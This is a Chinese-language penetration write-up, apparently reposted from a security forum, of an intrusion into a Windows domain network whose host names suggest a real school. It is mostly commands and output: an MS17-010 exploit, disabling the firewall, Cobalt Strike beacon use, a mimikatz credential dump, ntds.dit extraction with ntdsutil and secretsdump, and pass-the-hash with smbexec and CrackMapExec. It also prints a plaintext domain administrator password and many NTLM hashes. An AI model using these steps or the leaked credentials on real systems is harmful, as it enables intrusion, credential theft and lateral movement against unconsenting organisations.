Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[-] DLL Architecture is: 64 bit
Error sending wrong architecture DLL to target
[-] DLL NOT built
C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 x86
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully成功進入目標機器,本打算使用hta繼續彈一個beacon給cs,但是嘗試了幾次不好使。
使用密碼登錄3389,但是沒有登錄成功,3389確實開啟,這裡關閉防火牆。
C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.成功連接,連接上去之後,發現有殺毒,信任beacon或者添加c盤信任。
同樣的方式拿下3,2,4,41。
橫向縱橫
good14 beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:
介面: 10.10.10.2 --- 0xc
網際網路網址 實體位址 類型
10.10.10.1 6c-2b-59-7f-1e-74 動態
10.10.10.3 6c-2b-59-7f-1b-3c 動態
10.10.10.4 00-0c-29-f7-4e-92 動態
10.10.10.5 10-98-36-b0-ed-ad 動態
10.10.10.6 18-03-73-2c-46-9d 動態
10.10.10.8 00-0c-29-57-cd-5d 動態
10.10.10.10 00-11-32-5c-f9-0a 動態
10.10.10.11 00-10-18-06-09-eb 動態
10.10.10.12 00-10-18-1a-8c-08 動態
10.10.10.13 00-10-18-04-03-3c 動態
10.10.10.14 00-10-18-1a-66-4e 動態
10.10.10.17 00-0c-29-3c-30-ea 動態
10.10.10.19 20-47-47-82-31-a0 動態
10.10.10.20 20-47-47-82-31-a2 動態
10.10.10.21 98-90-96-bc-4f-6c 動態
10.10.10.22 98-90-96-bc-f2-09 動態
10.10.10.23 98-90-96-bc-ed-92 動態
10.10.10.25 18-66-da-2c-e0-de 動態
10.10.10.26 54-bf-64-6f-68-46 動態
10.10.10.27 e4-54-e8-92-95-f1 動態
10.10.10.28 54-bf-64-6f-68-28 動態
10.10.10.29 54-bf-64-6f-6b-04 動態
10.10.10.30 88-d7-f6-ae-e4-01 動態
10.10.10.33 e4-54-e8-92-9b-e7 動態
10.10.10.35 74-d4-35-6f-bc-12 動態
10.10.10.38 98-90-96-b6-ec-95 動態
10.10.10.39 88-d7-f6-ae-e3-6b 動態
10.10.10.41 98-90-96-b6-e6-e3 動態
10.10.10.42 e4-54-e8-92-a5-68 動態
10.10.10.44 18-03-73-ca-e4-5f 動態
10.10.10.47 08-97-98-aa-b4-98 動態
10.10.10.48 54-bf-64-6f-68-26 動態
10.10.10.49 00-d0-17-70-c1-03 動態
10.10.10.50 00-d0-17-70-c0-cc 動態
10.10.10.51 42-08-5b-6a-25-29 動態
10.10.10.56 78-45-c4-b9-b4-c6 動態
10.10.10.61 18-66-da-2c-e5-7f 動態
10.10.10.62 18-66-da-2d-04-25 動態
10.10.10.63 18-66-da-2d-01-1c 動態
10.10.10.65 20-47-47-25-a7-66 動態
10.10.10.66 20-47-47-25-a7-58 動態
10.10.10.68 20-47-47-25-a8-98 動態
10.10.10.69 20-47-47-25-aa-37 動態
10.10.10.72 54-bf-64-01-52-a0 動態
10.10.10.75 d8-d0-90-1d-92-d8 動態
10.10.10.78 d8-d0-90-1d-96-1c 動態
10.10.10.80 d8-d0-90-1d-96-1b 動態
10.10.10.82 10-7d-1a-0d-d5-1b 動態
10.10.10.84 08-9e-01-f3-f8-be 動態
10.10.10.85 f0-d4-e2-f7-62-83 動態
10.10.10.89 08-00-37-f0-2d-71 動態
10.10.10.90 00-11-32-aa-ab-42 動態
10.10.10.91 54-bf-64-6f-6a-fe 動態
10.10.10.95 64-00-6a-0b-f4-5c 動態
10.10.10.100 00-0c-29-19-e7-fa 動態
10.10.10.102 54-bf-64-6a-be-41 動態
10.10.10.104 64-00-6a-0b-f0-11 動態
10.10.10.105 64-00-6a-0b-76-a2 動態
10.10.10.106 64-00-6a-0b-ed-89 動態
10.10.10.111 6c-2b-59-f4-49-3b 動態
10.10.10.114 54-bf-64-6a-be-12 動態
10.10.10.116 54-bf-64-6f-6a-0c 動態
10.10.10.117 ec-d6-8a-3f-ba-84 動態
10.10.10.118 ec-d6-8a-4a-b2-19 動態
10.10.10.121 54-bf-64-6a-c2-e7 動態
10.10.10.126 54-bf-64-6a-be-4e 動態
10.10.10.133 54-bf-64-6a-be-03 動態
10.10.10.134 54-bf-64-6f-6a-0a 動態
10.10.10.136 54-bf-64-6f-15-f7 動態
10.10.10.142 54-bf-64-6a-bd-f0 動態
10.10.10.143 54-bf-64-6a-c1-66 動態
10.10.10.144 54-bf-64-6a-c1-47 動態
10.10.10.145 54-bf-64-6f-14-e7 動態
10.10.10.146 54-bf-64-6f-6a-03 動態
10.10.10.152 54-bf-64-6f-6a-2a 動態
10.10.10.154 54-bf-64-6f-6a-0e 動態
10.10.10.155 54-bf-64-6a-be-04 動態
10.10.10.156 54-bf-64-6f-6a-29 動態
10.10.10.159 c0-8a-cd-5f-5b-47 動態
10.10.10.160 ec-d6-8a-3f-ba-36 動態
10.10.10.161 54-bf-64-6a-be-1f 動態
10.10.10.162 54-bf-64-6f-14-4d 動態
10.10.10.163 54-bf-64-6a-be-a5 動態
10.10.10.164 54-bf-64-6f-14-57 動態
10.10.10.165 54-bf-64-6a-be-40 動態
10.10.10.166 54-bf-64-6a-c2-e4 動態
10.10.10.175 54-bf-64-6f-69-f2 動態
10.10.10.176 54-bf-64-6a-be-5a 動態
10.10.10.179 54-bf-64-6a-be-16 動態
10.10.10.180 54-bf-64-6f-14-79 動態
10.10.10.182 54-bf-64-6a-bd-f2 動態
10.10.10.192 18-03-73-2c-48-dc 動態
10.10.10.195 54-bf-64-6f-16-96 動態
10.10.10.196 e4-54-e8-92-9b-ac 動態
10.10.10.231 24-31-84-28-4a-34 動態
10.10.10.232 80-38-96-91-96-7d 動態
10.10.10.250 28-84-fa-dc-d5-46 動態
10.10.10.253 00-1d-aa-17-b1-40 動態
10.10.10.254 00-50-7f-c7-d8-b0 動態
10.10.11.6 18-03-73-21-70-71 動態
10.10.11.13 84-8f-69-fa-49-74 動態
10.10.11.17 00-0c-29-98-ae-8f 動態
10.10.11.19 00-0c-29-a3-bf-27 動態
10.10.11.20 00-1d-aa-89-9e-80 動態
10.10.11.77 00-1d-aa-46-3d-60 動態
10.10.11.100 18-66-da-2d-02-0c 動態
10.10.11.102 48-4d-7e-d0-b6-18 動態
10.10.11.103 18-66-da-37-91-7e 動態
10.10.11.105 18-66-da-22-f1-db 動態
10.10.11.106 48-4d-7e-de-2d-0c 動態
10.10.11.107 50-9a-4c-3f-c5-82 動態
10.10.11.110 50-9a-4c-40-aa-6f 動態
10.10.11.111 54-bf-64-a3-d3-47 動態
10.10.11.112 18-66-da-22-a7-d9 動態
10.10.11.113 48-4d-7e-de-09-94 動態
10.10.11.114 48-4d-7e-dd-00-3e 動態
10.10.11.116 18-66-da-1f-64-db 動態
10.10.11.117 48-4d-7e-f1-6c-8c 動態
10.10.11.118 48-4d-7e-f1-30-ee 動態
10.10.11.120 48-4d-7e-f1-2d-9e 動態
10.10.11.121 18-66-da-22-f5-13 動態
10.10.11.122 18-66-da-22-f3-1f 動態
10.10.11.124 18-66-da-22-f4-7b 動態
10.10.11.125 64-00-6a-76-3b-ce 動態
10.10.11.127 48-4d-7e-e4-b7-1c 動態
10.10.11.129 48-4d-7e-d1-ab-78 動態
10.10.11.130 48-4d-7e-dd-32-d4 動態
10.10.11.131 48-4d-7e-d1-5b-1e 動態
10.10.11.133 18-66-da-22-f2-35 動態
10.10.11.134 54-bf-64-a3-e0-63 動態
10.10.11.135 64-00-6a-8d-47-cb 動態
10.10.11.137 48-4d-7e-e3-e7-4b 動態
10.10.11.138 18-66-da-22-f4-5d 動態
10.10.11.140 48-4d-7e-df-84-bb 動態
10.10.11.141 50-9a-4c-3f-ff-bd 動態
10.10.11.142 18-66-da-22-ab-16 動態
10.10.11.143 48-4d-7e-df-96-99 動態
10.10.11.144 48-4d-7e-f2-4d-2d 動態
10.10.11.147 48-4d-7e-cf-88-f4 動態
10.10.11.148 64-00-6a-91-8b-ff 動態
10.10.11.248 64-00-6a-5d-9d-c7 動態
10.10.11.249 64-00-6a-74-a8-20 動態
10.10.11.254 00-50-7f-e0-78-18 動態
10.10.11.255 ff-ff-ff-ff-ff-ff 靜態
169.254.92.3 54-bf-64-20-66-1d 動態
169.254.222.47 18-66-da-2c-e0-f1 動態
224.0.0.2 01-00-5e-00-00-02 靜態
224.0.0.22 01-00-5e-00-00-16 靜態
224.0.0.251 01-00-5e-00-00-fb 靜態
224.0.0.252 01-00-5e-00-00-fc 靜態
239.254.1.2 01-00-5e-7e-01-02 靜態
239.255.102.18 01-00-5e-7f-66-12 靜態
239.255.255.250 01-00-5e-7f-ff-fa 靜態發現還有11段。
使用fcan掃描一下具體信息
beacon> shell C:\Windows\TAPI\f.exe -h 10.10.11.1/24 -pwdf C:\Windows\TAPI\pass.txt -user Administrator -domain WEGO -o C:\Windows\TAPI\1.txt
[+] received output:
10.10.11.99 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]10.10.11.8
[->]Win7x64Pro
[->]10.10.11.8
NetInfo:
[*]10.10.11.99
[->]backuwego
[->]10.10.11.99
[->]10.30.10.199
NetInfo:
[*]10.10.11.6
[->]stufiles
[->]10.10.11.6
10.10.11.8 (Windows 7 Professional 7601 Service Pack 1)
WebTitle:http://10.10.11.6:80 403 IIS 8.0 閰喟敦�航炊 - 403.14 - Forbidden
NetInfo:
[*]10.10.11.7
[->]digireadweb
[->]10.10.11.7
10.10.11.7 (Windows Server (R) 2008 Standard 6003 Service Pack 2)
WebTitle:http://10.10.11.95:443 400 400 Bad Request
WebTitle:http://10.10.11.95:80 200 None
SMB:10.10.11.6:445:WEGO\Administrator jo6ek6vul3vm,6
WebTitle:http://10.10.11.14:80 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.15:80 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.14:443 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.15:443 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.16:443 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.16:80 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.10:80 200 " + ID_EESX_Welcome + "
WebTitle:https://10.10.11.10:443 200 " + ID_EESX_Welcome + "
WebTitle:http://10.10.11.7:80 200 �����梯��訾�撠���-嚚��梯��扳��霈�嚚�
WebTitle:https://10.10.11.95:443 200 None
[+] received output:
WebTitle:https://10.10.11.77:443 200 Vigor 登入頁面
WebTitle:http://10.10.11.77:80 200 Vigor 登入頁面
WebTitle:https://10.10.11.254:443 200 Vigor Login Page
WebTitle:https://10.10.11.20:443 200 Vigor 登入頁面
WebTitle:http://10.10.11.254:80 200 Vigor Login Page
WebTitle:https://10.10.11.80:443 200 CN8000A - Cover
[+] received output:
scan end掃描smb服務看一下
beacon> shell C:\Windows\TAPI\f.exe -h 10.10.11.1/24 -pwdf C:\Windows\TAPI\pass.txt -user Administrator -domain WEGO -o C:\Windows\TAPI\1.txt -p 445 -m smb
icmp alive hosts len is: 21
10.10.11.7:445 open
10.10.11.8:445 open
10.10.11.6:445 open
10.10.11.99:445 open
SMB:10.10.11.6:445:WEGO\Administrator jo6ek6vul3vm,6機器很多,嘗試哈希傳遞攻擊。
登錄域控制器10.2的3389使用迷你卡姿,抓去所有域內的hash。
beacon> shell c:\Windows\TAPI\mimikatz.exe ""privilege::debug"" ""lsadump::lsa /patch full"" exit >>c:\Windows\TAPI\log1.txt
或者使用cs插件
ID : 00000e07 (3591)
User : ws4311
LM : 54191cf4166bc549aad3b435b51404ee
NTLM : 4790310f070043b5d1709a30aede1a27
RID : 00000e08 (3592)
User : ws4312
LM : 03b93594f7afee8caad3b435b51404ee
NTLM : 5dab331d3681f85c85503c9437cfc03b
RID : 00000e09 (3593)
User : ws4313
LM : d4cb20e652df2393aad3b435b51404ee
NTLM : b6a56cab9d2568151015094e90cbd21d
RID : 00000e0a (3594)
User : ws4314
LM : 687ac937560351a6aad3b435b51404ee
NTLM : d7a7fca890e9f3c1d435bd5fc0caf327
RID : 00000e0b (3595)
User : ws4315
LM : 0a19188cf464dda2aad3b435b51404ee
NTLM : 6f748524eda9a94cb30dd323695b092e
RID : 00000e0c (3596)
User : ws4316
LM : 7784d6e4bdf4f440aad3b435b51404ee
NTLM : 3cb0a4c08952437b6311db01eedd3c45密碼很多,這裡就截取一部分。
導出域成員hashSAM資料庫中保存的信息進行提取,全面獲取系統中的密碼信息,還要對SAM資料庫中保存的信息進行提取,導出當前系統中所有本地用戶的hash。
C:\Windows\system32>ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil: snapshot
快照: activate instance ntds
使用中執行個體已設定為 "ntds"。
快照: create
正在建立快照...
快照集 {1dc812ae-3ae6-475b-bb67-ccafe028ae69} 已經成功產生。
快照: quit
ntdsutil: quit
C:\Windows\system32>ntdsutil snapshot "mount {1dc812ae-3ae6-475b-bb67-ccafe028ae
69}" quit quit
ntdsutil: snapshot
快照: mount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已掛接為 C:\$SNAP_202012062103_VOLUM
EC$\
快照: quit
ntdsutil: quit
C:\Windows\system32>copy C:\$SNAP_202012062103_VOLUMEC$\Windows\NTDS\ntds.dit c:
\ntds.dit
複製了 1 個檔案。
C:\Windows\system32>最後刪除快照
C:\Windows\system32>ntdsutil snapshot "unmount {1dc812ae-3ae6-475b-bb67-ccafe028
ae69}" quit quit
ntdsutil: snapshot
快照: unmount {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已卸載。
快照: quit
ntdsutil: quit
C:\Windows\system32>ntdsutil snapshot "delete {1dc812ae-3ae6-475b-bb67-ccafe028
ae69}" quit quit
ntdsutil: snapshot
快照: delete {1dc812ae-3ae6-475b-bb67-ccafe028ae69}
快照 {3f3a24b3-ce4f-4096-852a-0b3864a8909d} 已經刪除。
快照: quit
ntdsutil: quit
C:\Windows\system32>導出sam和system:
C:\Windows\system32>reg save hklm\sam sam.hiv
操作順利完成。
C:\Windows\system32>reg save hklm\sam sam.hiv本地使用secretsdump.py,導出hash
➜ Public python3 1.py -ntds ntds.dit -system system.hiv LOCAL
哈希傳遞攻擊與基於IPC的橫向移動
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xaf91815108821533b8b5c1365be697c1
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: e28acd8770d422291bab9e2a9f8901d4
[*] Reading and decrypting hashes from ntds.dit
AD2$:15142:aad3b435b51404eeaad3b435b51404ee:ef72a0d5642a9234a14daf517e4a9ccc:::
AD3-OLD$:16625:aad3b435b51404eeaad3b435b51404ee:ef5035822b6ada38890c81bced3e7427:::
AD1$:16630:aad3b435b51404eeaad3b435b51404ee:216f5e93e84c580d8c7d54995b82f35d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TsInternetUser:1000:22c206eac925d8cb606c5c8235eade10:65b4ce0675d0bb69277b75712e409528:::
IUSR_MAIL:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IWAM_MAIL:1005:a7aa223e7443a354630461ad9692aa95:0792a2872e4c3fe838d2d35a985e4e6f:::
Administrator:500:e74b5db312ea77404726d0d0bb05c458:a9398c8a95dbe6801f280d2cfb9c76de:::PTH仍然是基於IPC遠程連接實現的。
smbexec 可以通過文件共享(admin$,c$,ipc$,d$)在遠程系統中執行命令。
目標系統必須開放445埠並且C$共享。
smbexec.py -hashes :<hash> 域/域用戶名@192.168.10.2
需要根據上面我們在域控制器中抓取的密碼,找到對應ip的對應主機名和哈希,才能使用smbexe,這裡找到AD3的對應關係。
➜ Downloads python3 smbexec.py administrator@10.10.10.3 -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
➜ NW python3 smbexec.py Administrator@10.10.10.41 -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>➜ NW python3 smbexec.py administrator@10.10.10.38 -hashes :a9398c8a95dbe6801f280d2cfb9c76de
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\WINDOWS\system32>接著嘗試3389等,中馬,反彈cs就行。
使用CrackMapExec實現Hash傳遞:
SMB 10.10.10.5 445 DATABASE [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.88 445 NONE [*] FXNICOS 0.1 (name:) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.10.100 445 CARD100 [*] Windows 7 Professional 7601 Service Pack 1 (name:CARD100) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB 10.10.10.2 445 AD1 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.20 445 FILES2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.101 445 PERSONNEL-3060 [*] Windows 10.0 Build 17134 x64 (name:PERSONNEL-3060) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:False)
SMB 10.10.10.19 445 FILES2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.22 445 ACADEMIC [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.103 445 LIB-3020-83 [*] Windows 7 Professional 7601 Service Pack 1 (name:LIB-3020-83) (domain:xx.xx.x x.xx) (signing:False) (SMBv1:True)
SMB 10.10.10.3 445 AD2 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.4 445 AD3 [+] xx.xx.x x.xx\administrator a9398c8a95dbe6801f280d2cfb9c76de (Pwn3d!)
SMB 10.10.10.39 445 ASUS-500G4-PC [-] xx.xx.x x.xx\administrator:a9398c8a95dbe6801f280d2cfb9c76de STATUS_NETLOGON_NOT_STARTED這裡注意該工具可以看到主機ip與用戶名的對應關係,結合之前拿到的hash文件:1.txt.ntds,把用戶名、主機ip、用戶hash就結合起來了。這裡截取一部分`。
STPC-37$:7840:aad3b435b51404eeaad3b435b51404ee:24eaa29232d5eab4d560f748bc4649b4:::
STPC-33$:7847:aad3b435b51404eeaad3b435b51404ee:6ca428fed76b726f1656f3606cb0b2c9:::
STPC-16$:7819:aad3b435b51404eeaad3b435b51404ee:ca8ff27d7b093aff95922a0b88e77f5c:::然後使用smbexec.py一個一個嘗試。
網斷還有個11段,太菜了,等學習了一下在打。
簡單看了一下,有web服務、ftp等。
這裡推薦一個師傅寫的內網掃描器:
https://github.com/shadow1ng/fscan
作者:暮秋初九,文章來源:先知社區
一如既往的學習,一如既往的整理,一如即往的分享。感謝支持
「如侵權請私聊公眾號刪文」
掃描關注LemonSec
覺得不錯點個「贊」、「在看」哦
相關焦點
-
【內網滲透系列】|15-內網滲透、橫向攻擊思路(文末贈送【 內網滲透 】書籍)
參考連結:內網滲透-不出網滲透技巧https://】|13-哈希傳遞攻擊利用(Pass The Hash)ATT&CK實戰系列-紅隊評估 (一)Vulnstack靶場內網域滲透ATT&CK實戰系列-紅隊評估 (二)Vulnstack靶場內網域滲透ATT&CK實戰系列-紅隊評估 (三)Vulnstack靶場內網域滲透 -
內網滲透(十四) | 工具的使用|Impacket的使用
CSDN安全博客專家,擅長滲透測試、Web安全攻防、紅藍對抗。 -
Metasploit和Cobaltstrike內網域滲透分析(實戰總結)
陸陸續續將vulnstack上面ATT&CK實戰系列紅隊靶場都完成了一遍,收穫良多,以前內網滲透方面域滲透的概念較為模糊,經過實戰靶場訓練 -
滲透測試內網滲透之信息收集(二)
示例:C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSLRecon-Invoke-Portscan 埠掃描 -
滲透測試內網--WMI命令
qwerty@12345678 process call create "cmd.exe /c ipconfig > C:\result.txt"使用type命令查看執行命令的結果:type \\192.168.19.142\c$\result.txtWMIEXEC命令:相對於PSEXEC優點是可以有邊界的交互,使用起來也比較方面,在內網滲透中使用也非常方便 -
內網滲透之域滲透命令執行總結
在域滲透場景中,我們已經進入內網,會遇到大量的開放埠和服務,弱密碼空密碼,這個時候我們可以使用它們已經開啟的服務選擇對應的方式進行命令執行。本文對ad域滲透中常見的命令執行方式進行一個總結。 -
從HTB-Querier靶場看內網滲透
文章來源|MS08067 內網安全知識 -
Frp內網穿透實戰
此時為了內網橫向滲透與團隊間的協同作戰,可以利用Frp在該機器與VPS之間建立一條「專屬通道」,並藉助這條通道達到內網穿透的效果。實戰中更多時候依靠 Socks5 。更多詳細使用方法,可查看官方Github,這裡不再贅述。https://github.com/fatedier/frp/前期準備先準備一臺VPS與域名。 -
記錄一次內網滲透詳細過程
環境是模擬的目標IP192.168.31.102 該web主機下 有兩臺虛擬機滲透目標:拿到虛擬機的shell -
滲透小記 - 中繼和委派的實戰利用
0x00 前言本文源自一次真實的滲透過程記錄,介紹基於資源的約束委派的另一種利用場景,希望能對各位看客有所幫助0x01 背景通過 VPN 撥入內網,根據下發路由和前期的探測發現目標內網存在 10.10.1.0/24 、10.10.2.0/24 兩個活躍段。 -
黑客工具:內網滲透神器Cobalt Strike,英雄聯盟中的無盡之刃
關注我你就是個網絡、電腦、手機小達人玩英雄聯盟的同學都知道,ad基本上都出無盡之刃的,因為他加暴擊,加攻擊,是個神器而我們玩滲透的,cobaltstrick就是我們的無盡之刃;無盡之刃下面來簡單介紹一下cobaltstrikeCobalt Strike是一款超級好用的滲透測試工具,擁有多種協議主機上線方式,集成了提權,憑據導出 -
乾貨 | 滲透測試實戰分享
在看白帽子們的漏洞的時候總有一種感覺就是把web滲透簡單地理解成了發現web系統漏洞進而獲取webshell。其實,個人感覺一個完整的滲透(從黑客的角度去思考問題)應該是以盡一切可能獲取目標的系統或者伺服器的最高權限,儘可能的發現足夠多的敏感信息。 -
滲透測試:滲透某大學從弱口令到 docker 逃逸
橫向移動在內網滲透中,當攻擊者獲取到內網某臺機器的控制權後,會以被攻陷的主機為跳板,通過收集域內憑證等各種方法,訪問域內其他機器,進一步擴大資產範圍 -
內網中間人的玩法
在內網滲透測試中,我們可以欺騙攻擊網絡配置和服務。 -
傳輸層隧道技術之lcx內網埠轉發
在滲透測試中,如果內網防火牆阻止了指定埠的訪問,在獲得目標機器的權限後,可以使用IPTABLES打開指定埠。如果內網中存在一系列防禦系統,TCP、UDP流量會被大量攔截。192.168.4.137window 7(受害者):1.1.1.10monowall防火牆:只允許通過TCP/UDP數據2.網絡拓撲圖內網 -
內網滲透-wmic命令
WMI在滲透測試中不需要下載和安裝,是Windows系統自帶功能,和cmd一樣用 在整個運行過程都在計算機內存中發生,不會留下任何操作痕跡。 -
Metasploit滲透測試實驗報告
2.在滲透過程中逐漸掌握科學的滲透測試方法,即 PTES標準滲透測試方法七個階段: 前期交互階段(跳過) 情報搜集階段 威脅建模階段 漏洞分析階段 滲透攻擊階段 後滲透攻擊階段 報告階段; 3.在滲透測試過程中逐漸清晰滲透所要求掌握的技能,有針對有目的的進行初步學習 -
滲透攻防工具篇-後滲透階段的Meterpreter
4.1、什麼是後滲透攻擊模塊4.2、後滲透攻擊模塊的實現原理4.3、enum_drives 第五節 植入後門5.1、persistence後滲透攻擊模塊5.2、metsvc 後滲透攻擊模塊1.1、什麼是Meterpreter -
域滲透總結
域滲透 —- 預備知識何為域域(Domain)是Windows網絡中獨立運行的單位,域之間相互訪問則需要建立信任關係(即Trust Relation)。信任關係是連接在域與域之間的橋梁。當一個域與其他域建立了信任關係後,2個域之間不但可以按需要相互進行管理,還可以跨網分配文件和印表機等設備資源,使不同的域之間實現網絡資源的共享與管理。 -
大牛傳經:滲透測試的經驗小記
滲透中常見的幾個問題1、防火牆穿透2、木馬免殺穿透3、內網信息收集及目標定位滲透,顧名思義已經獲取到目標的部分權限,需要進一步擴大戰果了,這裡會遇到各種各樣的問題,比如信息收集,比如目標的查找,比如文件下載的方式,比如等等首先說防火牆穿透,現在的業務環境各種ids,各種ngxxx,各種waf,isa